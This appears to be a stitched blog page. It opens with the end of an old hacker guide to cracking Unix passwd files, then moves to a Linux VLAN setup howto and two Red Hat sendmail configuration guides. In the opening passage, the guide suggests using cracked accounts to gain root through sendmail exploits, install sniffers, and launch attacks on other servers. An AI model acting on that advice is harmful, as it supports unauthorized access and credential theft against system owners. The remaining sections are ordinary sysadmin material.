If you get a passwd file from another contry get a wordlist with the same launguage as the worlist came from, as the users would probably use words they are familier with [=. There are some programs which can make random numbers to what you specify but that might not be really great, since there is such a huge amount of number combinations they could use. I am not completly saying they are useless since i have cracked a password with one before, I had fashoned my own list of 4 digit numbers since people might use their phone number and well it worked [=. 
____________________________________________________________________________

8. What to do with a Cracked Passwd file

What you can do with a passwd is up to you. The nice thing to do is inform the administator of the server that, accounts on his (or her) server are insucure and possibly open to anyone hacking an account and bringing havok upon their server. Some other things you can do is fire up good ole telnet and connect to one of their ports and see what you could do with that account. The possiblities are endless. You could hack a webpage (i wouldn’t do that on account of how lame it is to destruct someones piece of work.)¬†
You could use an exploit in sendmail and get root or install a sniffer on the system and get all the passwords you could ever want from it. You could use the account to do work on OTHER servers that you sure as hell wouldn’t want to do from your own. If your account is canceled you can use a hacked accounts dial up till you purchase a new one. Like I said the list goes on and on. I am sure noone wants you doing anything destuctive (its lame anyhow.) And the best thing to do is report the problem to the system admin so, if he finds out he won’t freak and call your admin and tell him you have been doing naughty things or even call the cops. I hope this text was informative enough to fufill your needs [=. Goat

From: http://crack0hack.wetpaint.com/page/[***The+Ultimate+Guide+Passwd+Files***]

VLAN ON LINUX

Posted: January 28, 2009 in LINUX, Linux Server
Tags: ,

Howto: Configure Linux Virtual Local Area Network 

 

VLAN is an acronym for Virtual Local Area Network. Several VLANs can co-exist on a single physical switch, which are configured via software (Linux commands and configuration files) and not through hardware interface (you still need to configure switch).

Hubs or switch connects all nodes in a LAN and node can communicate without a router. For example, all nodes in LAN A can communicate with each other without the need for a router. If a node from LAN A wants to communicate with LAN B node, you need to use a router. Therefore, each LAN (A, B, C and so on) are separated using a router.

VLAN as a name suggest combine multiple LANs at once. But what are the advantages of VLAN?

  • Performance
  • Ease of management
  • Security
  • Trunks
  • You don’t have to configure any hardware device, when physically moving server computer to another location etc.

VLAN concepts and fundamental discussion is beyond the scope of this article. I am reading following textbooks. I found these textbooks extremely useful and highly recommended:

  • Cisco CNNA ICND books (part I and II)
  • Andrew S. Tanenbaum, Computer Networks book

Linux VLAN Configuration Issue

I am lucky enough to get couple of hints from our internal wiki docs :D.

  • Not all network drivers support VLAN. You may need to patch your driver.
  • MTU may be another problem. It works by tagging each frame i.e. an Ethernet header extension that enlarges the header from 14 to 18 bytes. The VLAN tag contains the VLAN ID and priority. See Linux¬†VLAN site¬†for patches and other information.
  • Do not use VLAN ID 1 as it may be used for admin purpose.

Linux VLAN How To

My VLAN ID is 5. So I need to copy file /etc/sysconfig/network-scripts/ifcfg-eth0 to /etc/sysconfig/network-scripts/ifcfg-eth0.5

# cp /etc/sysconfig/network-scripts/ifcfg-eth0 /etc/sysconfig/network-scripts/ifcfg-eth0.5
Now, I’ve one network card (eth0) and it needs to use tagged network traffic for VLAN ID 5.

  • eth0¬†– Your regular network interface
  • eth0.5¬†– Your virtual interface that use untagged frames

Do not modify /etc/sysconfig/network-scripts/ifcfg-eth0 file. Now open file /etc/sysconfig/network-scripts/ifcfg-eth0.5 using vi text editor:
# vi /etc/sysconfig/network-scripts/ifcfg-eth0.5
Find DEVICE=ifcfg-eth0line and replace with:
DEVICE=ifcfg-eth0.5
Append line:
VLAN=yes
Also make sure you assign correct IP address using DHCP or static IP. Save the file. Remove gateway entry from all other network config files. Only add gateway to /etc/sysconfig/network file. Save and close the file. Restart network:
# /etc/init.d/network restart
Please note that if you need to configure for VLAN ID 2 then copy the copy file /etc/sysconfig/network-scripts/ifcfg-eth0 to /etc/sysconfig/network-scripts/ifcfg-eth0.2 and do the above procedure again.

Using vconfig command

Above method is perfect and works with Red hat Enterprise Linux / CentOS / Fedora Linux without any problem. However, you will notice that there is a command called vconfig. The vconfig program allows you to create and remove vlan-devices on a vlan enabled kernel. Vlan-devices are virtual ethernet devices which represents the virtual lans on the physical lan.

Please note that this is yet another method of configuring VLAN. If you are happy with above method no need to read below.

Add VLAN ID 5 with follwing command for eth0:
# vconfig add eth0 5

The vconfig add command creates a vlan-device on eth0 which result into eth0.5 interface. You can use normal ifconfig command to see device information:
# ifconfig eth0.5
Use ifconfig to assign IP address to vlan interfere :
# ifconfig eth0.5 192.168.1.100 netmask 255.255.255.0 broadcast 192.168.1.255 up
Get detailed information about VLAN interface:
# cat /proc/net/vlan/eth0.5
If you wish to delete VLAN interface delete command:
# ifconfig eth0.5 down
# vconfig rem eth0.5

A VLAN is a ‚ÄúVirtual Local Area Network‚ÄĚ and is present in L2 (Level 2) of the protocal stack.

A host may be a server, workstation or other device which conforms to 802.1q specification. Therefore, it is possible (with certain limitations) to attach a laptop to a VLAN seen by a server.

802.1q provides for an additional 4-bytes of information added to the L2 frame, 12 bits of which indicate the VLAN is. Thus one may have 4K VLANs.

When you want to configure a VLAN in Linux, assuming your kernel supports it (2.6+ do) you need to make sure 802.1q support is available. This is most easily done with modprobe. So the command:

/sbin/modprobe 8021q

should do the trick.

Then, for any given NIC interface you only have to do the following:

/sbin/vconfig add eth
/sbin/ifconfig eth. 192.168.0.x netmask 255.255.255.0

Of course I just picked some arbitrary class C address, you would have to use what is appropriate for you.

You may need then to add to the routing table (not knowing what Linux you are running) something like:

/sbin/route add -net 192.168.0.0 netmask 255.255.255.0 eth.

ALL THE ABOVE MUST BE AS ROOT.

Virtual LAN configuration

You can create a VLAN on Linux by executing the following commands:
vconfig add
ifconfig . netmask
ifconfig . up

For example:
vconfig add eth0 6
ifconfig eth0.5 192.168.1.6 netmask 255.255.255.0
ifconfig eth0.6 up

You can view the traffic of that VLAN by executing the following command:

cat /proc/net/vlan/eth0.6

like you can configure 2048 VLANs for one physical interface.

Advantages of VLANs

VLANs provide a number of benefits to a network designer. The first advantage is the number of devices required to implement a given network topology can be reduced. Without VLANs, if your network design requires ten machines divided into five different LANs, you would need five different switches or hubs, and most of the ports would be wasted. With VLANs, this work could be done with one device.

Most routers and standard computers can support a limited number of physical network interfaces. Although dual and quad-port Ethernet adapters are available, these are expensive. For example, a quad-port Ethernet card may cost $400. VLAN capable switches start at around $500, but they support many more interfaces.

Depending on the scenario, VLANs and trunks can provide an effective way of segmenting a network without the expense and complexity of managing many physical interfaces.

 

Sendmail Mods — Using Sendmail Correctly As an Internal Mail Handler

Modifying the sendmail.mc file for internal servers….

Listed below are the changes to a default RH 9 /etc/mail/sendmail.mc file required to operate a mail server behind a corectly configured Sendmail gateway server. These intranet servers can send mail to local users, users on the gateway server, and external Internet addresses. Why would you want to do this? There are many applications that utilize mail (sendmail) to send status information and data to you or other users. Some examples of such handy software include cron, apinger, and logwatch. However, you may not want to expose these internal machines to the outside world. The following details will allow you to use your gateway server as a relay.

Again, this is a specialized application of Sendmail. For a more general application, see our other page.

We will assume that your firewall will not let outsiders touch these internal servers on port 25. As such, several of the lock-down and anti-spam measures that were implemented on the gateway server will not be emplemented here.

You are NOT done once you change the .mc file. There are other changes that need to be done to the server.

Anything not listed for change/add/delete here should work fine with the default settings. I do NOT know if this will work for any other installation (e.g. Red Hat 7.2 or Mandrake). This worked with the default sendmail RPM shipped with RH 9 (and subsequent sendmail updates). I gleaned some parts of this from several sources but one of your best resources is the published Red Hat documentation.RTFM. Red Hat has excellent manuals and you will find most of this stuff there.

Some hearty souls may chose to edit the sendmail.cf file directly however I do not see the need for this. The whole idea of the sendmail.mc file is to make the configuration file manageable and to generate the .cf file. When I dove into this, I read as much as I could, including the vaunted O’Reilly Bat Book. Everything I read said to stick with the macros (m4 and mc) and let them generate the .cf. I’ve played with both files from time to time and find the .mc to be much more manageable for my pea-brain. The sendmail.mc file is 145 lines, the sendmail.cf file is 1800 lines. You figure it out….

You will need to run make -C /etc/mail as root to generate the sendmail.cf file from the sendmail.mc macro after you are finished making these changes. You will also need to do a /sbin/service sendmail restart as root once you have made the new sendmail.cf file. More on this below.

Please let me know if you see any errors or omissions in this document. Also, note that I am well aware I am not saving the world here.


Some definitions:

Comment out: Place a dnl or a dnl # in front of the line in the macro file. This will cause the m4 compiler to ignore that line.

Uncomment: Remove the dnl or dnl # in front of the line in the macro file. There may also be changes after you uncomment.

Add: New lines that should be added just like they are shown.

Replace: Replace the existing line (which will be shown) with the new line.

Notes: These are listed in roughly the order they appear in the sendmail.mc file, not by importance. I suggest you read through them all and sort out the ones you need. Don’t change the order of things too much as the compiler can get picky if too many things are defined out of order. Also, they insist on using forward-single-quotes (`) which are a pain if you don’t notice them. It is best to copy existing lines and modify them so you don’t mix up the forward and standard quotes.


Modify the actual sendmal.mc file

1. The most important change you need to make is this first step. You must comment out the following line:

DAEMON_OPTIONS(`Port=smtp,Addr=127.0.0.1, Name=MTA’)dnl

This will allow sendmail to make connections with machines other than the localhost. Duh. The reason for having this line included (turned on) by default will be left as an exercise for the reader.

2. Comment out the following line:

define(`UUCP_MAILER_MAX’, 2000000′)dnl

You don’t need this. Leave it if you like.

3. Comment out the following line:

FEATURE(`local_procmail,`’, `procmail -t -Y -a $h -d $u’)dnl

You don’t need procmail for the simple stuff. Leave it or modify it if you like.

4. Comment out the following line:

EXPOSED_USER(`root’)dnl

Leave it or modify it if you like.

5. Comment out the following line:

FEATURE(`accept_unresolvable_domains’)dnl

If this line is NOT commented out, you will open yourself up to more spam as sendmail will not do one of its basic checks on the incoming MTA.

6. Another key change is to set up your gateway machine as your “null client”. This is done by the following add:

FEATURE(`nullclient’,`[192.168.100.1]’)dnl ¬†¬†(assuming your SMTP gateway machine is 192.168.100.1)

This will forward mail to your other machine which will interface to the outside world and local users. You will need to have your access file set up correctly on your gateway machine to allow relaying from this internal sendmail machine.

7. Replace the following line and modify it as required.

MASQUERADE_AS(`mydomain.com’)dnl Becomes

MASQUERADE_AS(`eexamplee.net’)dnl

This causes all sent mail to appear to come from eexamplee.net.

8. Replace the following line and modify it as required.

MASQUERADE_AS(mydomain.com)dnl Becomes

MASQUERADE_AS(eexamplee.net)dnl

Note this is identical to the previous line except without the single quotes. Don’t know about this one.

9. Uncomment the following:

FEATURE(masquerade_envelope)dnl

This is similar to the previous masquerade statement except in also masquerades the entire envelope.

10. Replace and modify the following:

LOCAL_DOMAIN(`mydomain.com’)dnl Becomes

LOCAL_DOMAIN(`eexamplee.net’)dnl

This defines the domain name to masquerade.

11. Comment out the following line:

MAILER(smtp)dnl

12. Comment out the following line:

MAILER(procmail)dnl

Other changes beyond sendmail.mc

The next step is to modify the ancillary files to let sendmail do its thing.

Setting up the access file

The /etc/mail/access file allows you to block access to the mail server based on host names and IP addresses. You can use this to create blacklists and whitelists although they can be a bit hard to maintain as they are static. There are some lines you need to have in here even if you don’t explicitly list anything else. The required lines are the localhost and the hostname.

hostname.eexamplee.net RELAY localhost RELAY 127.0.0.1 RELAY 192.168.5 RELAY 192.168.100 RELAY

Setting up the local-host-names file

The /etc/mail/local-host-names file defines the aliases for the local machine. You want to put all the names in here that will be used by sendmail to define the host.

# local-host-names – include all aliases for your machine here.
eexamplee.net.net
mail.eexamplee.net

Pretty self explanatory.

Modifying the aliases file

The /etc/aliases file contains the mail aliases for the server. It is important that some of these be here to be compliant with RFCs. Usually you will only need to edit the last line.

# Person who should get root’s mail
root:           billybob

You may want to add some other lines for something like spamtrap: or any other aliases.

 

Burn it!

Now we will make sure everything is prepped and ready to use by sendmail. Execute the following commands as root:

/usr/bin/newalises    This activates the changes you made to the /etc/aliases file. Note: if you change aliases in the future, you only need to execute this command, you do not need to restart sendmail for the changes to show through.

makemap hash /etc/mail/access < /etc/mail/access    This creates a hashed version of your access database. This will keep your ISP username and password secure. A new /etc/mail/access.db file will be created.

makemap hash /etc/mail/local-host-names < /etc/mail/local-host-names    Like above, this creates a one-way hash of the local-host-names file you modified.

make -C /etc/mail ¬†¬†¬†(That’s an upper case “C”) This creates the /etc/mail/sendmail.cf file from the /etc/mail/sendmail.mc file you modified earlier. Note: some of the above steps are covered here by the makefile but it won’t hurt to make them again.

Now all you have to do is restart the server.

/sbin/service sendmail restart    This will kill the sendmail job (if its running) and restart it using all your configuration changes.

That’s it!

Sendmail Mods — Using Sendmail Correctly From Your Dynamic ISP Address

Modifying the sendmail.mc file to make it work….

Listed below are the changes to a default RH 9 /etc/mail/sendmail.mc file required to operate a mail server behind a non-reversible IP address. This should work for DSL, cable modem and [shudder] dial-up. If you can’t do a reverse DNS lookup on your domain and have it resolve to your IP (dynamic or otherwise) you may have trouble delivering mail to many destinations. These changes are also good for general sendmail set-up except you may want to omit step 3.

You are NOT done once you change the .mc file. There are other changes that need to be done to the server.

shoulder

Anything not listed for change/add/delete here should work fine with the default settings. I do NOT know if this will work for any other installation (e.g. Red Hat 7.2 or Mandrake). This worked with the default sendmail RPM shipped with RH 9 (and subsequent sendmail updates). I gleaned some parts of this from several sources but one of your best resources is the published Red Hat documentation.RTFM. Red Hat has excellent manuals and you will find most of this stuff there.

Some hearty souls may chose to edit the sendmail.cf file directly however I do not see the need for this. The whole idea of the sendmail.mc file is to make the configuration file manageable and to generate the .cf file. When I dove into this, I read as much as I could, including the vaunted O’Reilly Bat Book. Everything I read said to stick with the macros (m4 and mc) and let them generate the .cf. I’ve played with both files from time to time and find the .mc to be much more manageable for my pea-brain. The sendmail.mc file is 145 lines, the sendmail.cf file is 1800 lines. You figure it out….

You will need to run make -C /etc/mail as root to generate the sendmail.cf file from the sendmail.mc macro after you are finished making these changes. You will also need to do a /sbin/service sendmail restart as root once you have made the new sendmail.cf file. More on this below.

Please let me know if you see any errors or omissions in this document. Also, note that I am well aware I am not saving the world here.


 

Some definitions:

Comment out: Place a dnl or a dnl # in front of the line in the macro file. This will cause the m4 compiler to ignore that line.

Uncomment: Remove the dnl or dnl # in front of the line in the macro file. There may also be changes after you uncomment.

Add: New lines that should be added just like they are shown.

Replace: Replace the existing line (which will be shown) with the new line.

Notes: These are listed in roughly the order they appear in the sendmail.mc file, not by importance. I suggest you read through them all and sort out the ones you need. Don’t change the order of things too much as the compiler can get picky if too many things are defined out of order. Also, they insist on using forward-single-quotes (`) which are a pain if you don’t notice them. It is best to copy existing lines and modify them so you don’t mix up the forward and standard quotes.


Modify the actual sendmal.mc file

 

1. The most important change you need to make is this first step. You must comment out the following line:

DAEMON_OPTIONS(`Port=smtp,Addr=127.0.0.1, Name=MTA’)dnl

This will allow sendmail to make connections with machines other than the localhost. Duh. The reason for having this line included (turned on) by default will be left as an exercise for the reader.

2. Comment out the following line:

FEATURE(`accept_unresolvable_domains’)dnl

If this line is NOT commented out, you will open yourself up to more spam as sendmail will not do one of its basic checks on the incoming MTA.

3. Another key change is to set up your ISP as your “smart host”. This is done by the following replace:

dnl define(`SMART_HOST’,`smtp.your.provider’) ¬†Becomes

define(`SMART_HOST’,`outgoing.earthlink.net’)¬†¬†¬†(or whatever your ISP’s SMTP gateway is)

You are essentially using your ISP as a mail relay. This is the same technique that spammers use (in an attempt) to hide their identity. Here, we do it so that the mail will be sourced from an established IP that will pass a reverse DNS test. The server at outgoing.earthlink.net will very likely require a login to relay like this. We will take care of that later. Your ISP sees this as an SMTP (port 25) connection just like you sent it from an MUA like Outlook. Most large organizations like AOL, Hotmail and Juno will not accept mail from your DSL or cable-modem address. You do not have to do this to make your server work, but expect a large number of bounces if you don’t.

4. Add the following line:

define(`confBIND_OPTS’, `WorkAroundBrokenAAAA’)dnl

This change is a work-around for broken name servers. Its not a big deal although some of the blacklists (See below) recommend you have this enabled.

5. Replace the following line to fine tune the response to MTA queries and increase your privacy:

define(`confPRIVACY_FLAGS’, `authwarnings,novrfy,noexpn,restrictqrun’)dnl ¬†Becomes

define(`confPRIVACY_FLAGS’, `goaway,restrictqrun’)dnl

This increases security by limiting the amount of information your sendmail server spews out to door-knockers. This is also an anti-spam measure. Note that “goaway” is a short-hand version of many of the flags in the original configuration line.

6. This one is just for fun and probably violates some RFCs so I would not recommend doing it. Add the following:

define(`confSMTP_LOGIN_MSG’,`$j Microsoft SMTPSVC 4.0.1095.2600′)

This makes the mail server advertise itself as the defined string during SMTP connections. I did this in an attempt to fool people into believing that I was running a Microsoft server. Security through obscurity. It doesn’t work. Any scanning tool such as Nessus can see right through this ruse.

7. Uncomment the following line:

FEATURE(`delay_checks’)dnl

Another non-essential change, however it provides some extra information when spammers attempt to connect or relay through your machine.

8. Now we add some heavyweight spam fighters. The blacklists. Add the following lines:

FEATURE(dnsbl,`zen.spamhaus.org’,`”550 Mail from site rejected; see http://www.spamhaus.org”&#8216;)dnl
FEATURE(enhdnsbl,`bl.spamcop.net’,`”550 Server blocked see: http://spamcop.net/bl.shtml?”$&amp;{client_addr}’,`t’)dnl
FEATURE(dnsbl, `dnsbl.njabl.org’, `”550 Email rejected – see http://njabl.org”&#8216;)dnl

These are only some of the blacklists available. A good list can be found here. Be careful about using some of those listed on that site as they are very aggressive and may cause false positives. The whole idea of blacklists has caused some vociferous arguments. If you are gun shy about possibly blocking some legitimate email, don’t use them or use something tame like McFadden Associates blacklist which will allow legit users to over-ride your blacklist. The “enhdnsbl” is an enhanced blacklist check that gives you other options on the FEATURE line. Check the homepage of the sites for instructions on how to use the dnsbl command with their particular blacklist.
NOTE: We no longer use or recommend the SORBS blacklist because of unreliable data and inaccessible web page.

9. Replace the following line and modify it as required.

MASQUERADE_AS(`mydomain.com’)dnl Becomes

MASQUERADE_AS(`eexamplee.net’)dnl

This causes all sent mail to appear to come from eexamplee.net.

10. Replace the following line and modify it as required.

MASQUERADE_AS(mydomain.com)dnl Becomes

MASQUERADE_AS(eexamplee.net.)dnl

Note this is nearly identical to the previous line except without the single quotes. Don’t know about this one although it comes directly from Red Hat documentation, I don’t believe it is required (???).

11. Uncomment the following:

FEATURE(masquerade_envelope)dnl

This is similar to the previous masquerade statement except in also masquerades the entire envelope.

12. Uncomment the following line:

FEATURE(masquerade_entire_domain)dnl

This causes all hosts to be masqueraded as eexamplee.net even host1.eexamplee.net and hostxyx.eexamplee.net. This will be important if you set up other machines behind your mail server and use it as a gateway.

13. Add the following line:

FEATURE(always_add_domain)dnl

This will add the domain name to all outbound mail.

14. Replace and modify the following:

MASQUERADE_DOMAIN(`mydomain.com’)dnl Becomes

MASQUERADE_DOMAIN(`eexamplee.net’)dnl

This defines the domain name to masquerade.

 

Other changes beyond sendmail.mc

The next step is to modify the ancillary files to let sendmail do its thing.

Setting up the access file

The /etc/mail/access file allows you to block access to the mail server based on host names and IP addresses. You can use this to create blacklists and whitelists although they can be a bit hard to maintain as they are static. There are some lines you need to have in here even if you don’t explicitly list anything else.

mail.eexamplee.net RELAY localhost RELAY 127.0.0.1 RELAY 192.168.5 RELAY 192.168.100 RELAY

These allow mail from the local host and from others on your network to use the server to get to the outside world. Of course you will need to modify these networks to your configuration. I have 192.168.5 and 192.168.100 addresses behind my firewall so they are in this list.

The next step is to add the login information to the /etc/mail/access file. This is required to let your ISP server know who you are when you request a relay of mail to the rest of the world. The example below uses plain text logins which means your username and password are sent in plain text. Although this is not secure, it is also not uncommon. You will want to see if they will allow secure password authentication. You can then modify the lines below to use a different method other than LOGIN PLAIN. Also, you will want to make sure privileges on this file are set accordingly so that local users can not see these username/password combinations. This is not a problem as sendmail doesn’t use this file directly, it uses the database hash which will be created later.

AuthInfo:earthlink.net “U:username1” “P:secret” “M:LOGIN PLAIN”
AuthInfo:outgoing.earthlink.net “U:username1” “P:secret” “M:LOGIN PLAIN”

AuthInfo tells sendmail to use this information to answer authorization requests from the remote MTA. The next item is obviously the server name. U is the username to login and P is the password. M is the method of authentication used (see comments in above paragraph).

Setting up the local-host-names file

The /etc/mail/local-host-names file defines the aliases for the local machine. You want to put all the names in here that will be used by sendmail to define the host.

# local-host-names – include all aliases for your machine here.
eexamplee.net.net
mail.eexamplee.net

Pretty self explanatory.

Modifying the aliases file

The /etc/aliases file contains the mail aliases for the server. It is important that some of these be here to be compliant with RFCs. Usually you will only need to edit the last line.

# Person who should get root’s mail
root:           billybob

You may want to add some other lines for something like spamtrap: or any other aliases.

 

Burn it!

Now we will make sure everything is prepped and ready to use by sendmail. Execute the following commands as root:

/usr/bin/newalises    This activates the changes you made to the /etc/aliases file. Note: if you change aliases in the future, you only need to execute this command, you do not need to restart sendmail for the changes to show through.

makemap hash /etc/mail/access < /etc/mail/access    This creates a hashed version of your access database. This will keep your ISP username and password secure. A new /etc/mail/access.db file will be created.

makemap hash /etc/mail/local-host-names < /etc/mail/local-host-names    Like above, this creates a one-way hash of the local-host-names file you modified.

make -C /etc/mail ¬†¬†¬†(That’s an upper case “C”) This creates the /etc/mail/sendmail.cf file from the /etc/mail/sendmail.mc file you modified earlier. Note: some of the above steps are covered here by the makefile but it won’t hurt to make them again.

Now all you have to do is restart the server.

/sbin/service sendmail restart    This will kill the sendmail job (if its running) and restart it using all your configuration changes.

That’s it! Now just sit back and watch the spam roll in.